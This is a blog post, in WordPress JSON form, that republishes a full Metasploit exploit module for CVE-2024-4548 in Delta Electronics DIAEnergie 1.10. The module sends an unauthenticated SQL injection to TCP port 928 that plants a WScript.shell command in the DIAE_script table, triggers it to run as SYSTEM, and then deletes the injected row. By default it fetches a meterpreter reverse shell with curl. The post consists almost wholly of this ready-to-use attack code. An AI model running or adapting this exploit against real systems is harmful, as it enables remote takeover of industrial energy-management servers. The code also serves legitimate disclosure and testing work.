{"id":59086,"date":"2024-08-22T18:50:06","date_gmt":"2024-08-22T15:50:06","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180334\/diaenergie_sqli.rb.txt"},"modified":"2024-08-22T18:50:06","modified_gmt":"2024-08-22T15:50:06","slug":"diaenergie-1-10-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/diaenergie-1-10-sql-injection\/","title":{"rendered":"DIAEnergie 1.10 SQL Injection"},"content":{"rendered":"

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
prepend Msf::Exploit::Remote::AutoCheck<\/p>\n

def initialize(info = {})
super(
update_info(
info,
‘Name’ => ‘DIAEnergie SQL Injection (CVE-2024-4548)’,
‘Description’ => %q{
SQL injection vulnerability in DIAEnergie <= v1.10 from Delta Electronics.
This vulnerability can be exploited by an unauthenticated remote attacker to gain arbitrary code execution through a SQL injection vulnerability in the CEBC service. The commands will get executed in the context of NT AUTHORITY\\SYSTEM.
},
‘License’ => MSF_LICENSE,
‘Author’ => [
‘Michael Heinzl’, # MSF exploit
‘Tenable’ # Discovery & PoC
],
‘References’ => [
[ ‘URL’, ‘https:\/\/www.tenable.com\/security\/research\/tra-2024-13’],
[ ‘CVE’, ‘2024-4548’]],
‘DisclosureDate’ => ‘2024-05-06’,
‘Platform’ => ‘win’,
‘Arch’ => [ ARCH_CMD ],
‘Targets’ => [
[
‘Windows_Fetch’,
{
‘Arch’ => [ ARCH_CMD ],
‘Platform’ => ‘win’,
‘DefaultOptions’ => {
‘FETCH_COMMAND’ => ‘CURL’,
‘PAYLOAD’ => ‘cmd\/windows\/http\/x64\/meterpreter\/reverse_tcp’
},
‘Type’ => :win_fetch
}
]],
‘DefaultTarget’ => 0,<\/p>\n

‘Notes’ => {
‘Stability’ => [CRASH_SAFE],
‘Reliability’ => [REPEATABLE_SESSION],
‘SideEffects’ => [IOC_IN_LOGS]}
)
)<\/p>\n

register_options(
[
Opt::RPORT(928)
])
end<\/p>\n

# Determine if the DIAEnergie version is vulnerable
def check
begin
connect
sock.put ‘Who is it?’
res = sock.get || ”
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
vprint_error(e.message)
return Exploit::CheckCode::Unknown
ensure
disconnect
end<\/p>\n

if res.empty?
vprint_status(‘Received an empty response.’)
return Exploit::CheckCode::Unknown
end<\/p>\n

vprint_status(‘Who is it response: ‘ + res.to_s)
version_pattern = \/\\b\\d+\\.\\d+\\.\\d+\\.\\d+\\b\/
version = res.match(version_pattern)<\/p>\n

if version[0].nil?
Exploit::CheckCode::Detected
end<\/p>\n

vprint_status(‘Version retrieved: ‘ + version[0])<\/p>\n

unless Rex::Version.new(version) <= Rex::Version.new(‘1.10.1.8610’)
return CheckCode::Safe
end<\/p>\n

return CheckCode::Appears
end<\/p>\n

def exploit
execute_command(payload.encoded)
end<\/p>\n

def execute_command(cmd)
scname = Rex::Text.rand_text_alphanumeric(5..10).to_s
vprint_status(‘Using random script name: ‘ + scname)<\/p>\n

year = rand(2024..2026)
month = sprintf(‘%02d’, rand(1..12))
day = sprintf(‘%02d’, rand(1..29))
random_date = “#{year}-#{month}-#{day}”
vprint_status(‘Using random date: ‘ + random_date)<\/p>\n

hour = sprintf(‘%02d’, rand(0..23))
minute = sprintf(‘%02d’, rand(0..59))
second = sprintf(‘%02d’, rand(0..59))
random_time = “#{hour}:#{minute}:#{second}”
vprint_status(‘Using random time: ‘ + random_time)<\/p>\n

# Inject payload
begin
print_status(‘Sending SQL injection…’)
connect
vprint_status(“RecalculateHDMWYC~#{random_date} #{random_time}~#{random_date} #{random_time}~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N’#{scname}’, N’CreateObject(\\”WScript.shell\\”).run(\\”cmd \/c #{cmd}\\”)’, N”, N”);–“)
sock.put “RecalculateHDMWYC~#{random_date} #{random_time}~#{random_date} #{random_time}~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N’#{scname}’, N’CreateObject(\\”WScript.shell\\”).run(\\”cmd \/c #{cmd}\\”)’, N”, N”);–“
res = sock.get
unless res.to_s == ‘RecalculateHDMWYC Fail! The expression has too many closing parentheses.’
fail_with(Failure::UnexpectedReply, ‘Unexpected reply from the server received: ‘ + res.to_s)
end<\/p>\n

vprint_status(‘Injection – Expected response received: ‘ + res.to_s)
disconnect<\/p>\n

# Trigger
print_status(‘Triggering script execution…’)
connect
sock.put “RecalculateScript~#{random_date} #{random_time}~#{random_date} #{random_time}~1”
res = sock.get
unless res.to_s == ‘Recalculate Script Start!’
fail_with(Failure::UnexpectedReply, ‘Unexpected reply from the server received: ‘ + res.to_s)
end
vprint_status(‘Trigger – Expected response received: ‘ + res.to_s)<\/p>\n

disconnect<\/p>\n

print_good(‘Script successfully injected, check thy shell.’)
ensure
# Cleanup
print_status(‘Cleaning up database…’)
connect
sock.put “RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);DELETE FROM DIAEnergie.dbo.DIAE_script WHERE name=’#{scname}’;–“
res = sock.get
unless res.to_s == ‘RecalculateHDMWYC Fail! The expression has too many closing parentheses.’
fail_with(Failure::UnexpectedReply, ‘Unexpected reply from the server received: ‘ + res.to_s)
end
vprint_status(‘Cleanup – Expected response received: ‘ + res.to_s)<\/p>\n

disconnect
end
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"

class MetasploitModule < Msf::Exploit::RemoteRank = ExcellentRankinginclude Msf::Exploit::Remote::Tcpprepend Msf::Exploit::Remote::AutoCheck def initialize(info = {})super(update_info(info,‘Name’ => ‘DIAEnergie SQL Injection (CVE-2024-4548)’,‘Description’ => %q{SQL injection vulnerability in DIAEnergie <= v1.10 from Delta Electronics.This vulnerability can be exploited by an unauthenticated remote attacker to gain arbitrary code execution through a SQL injection vulnerability in the CEBC service. The commands will get …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59086","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59086","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59086"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59086\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59086"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59086"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59086"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}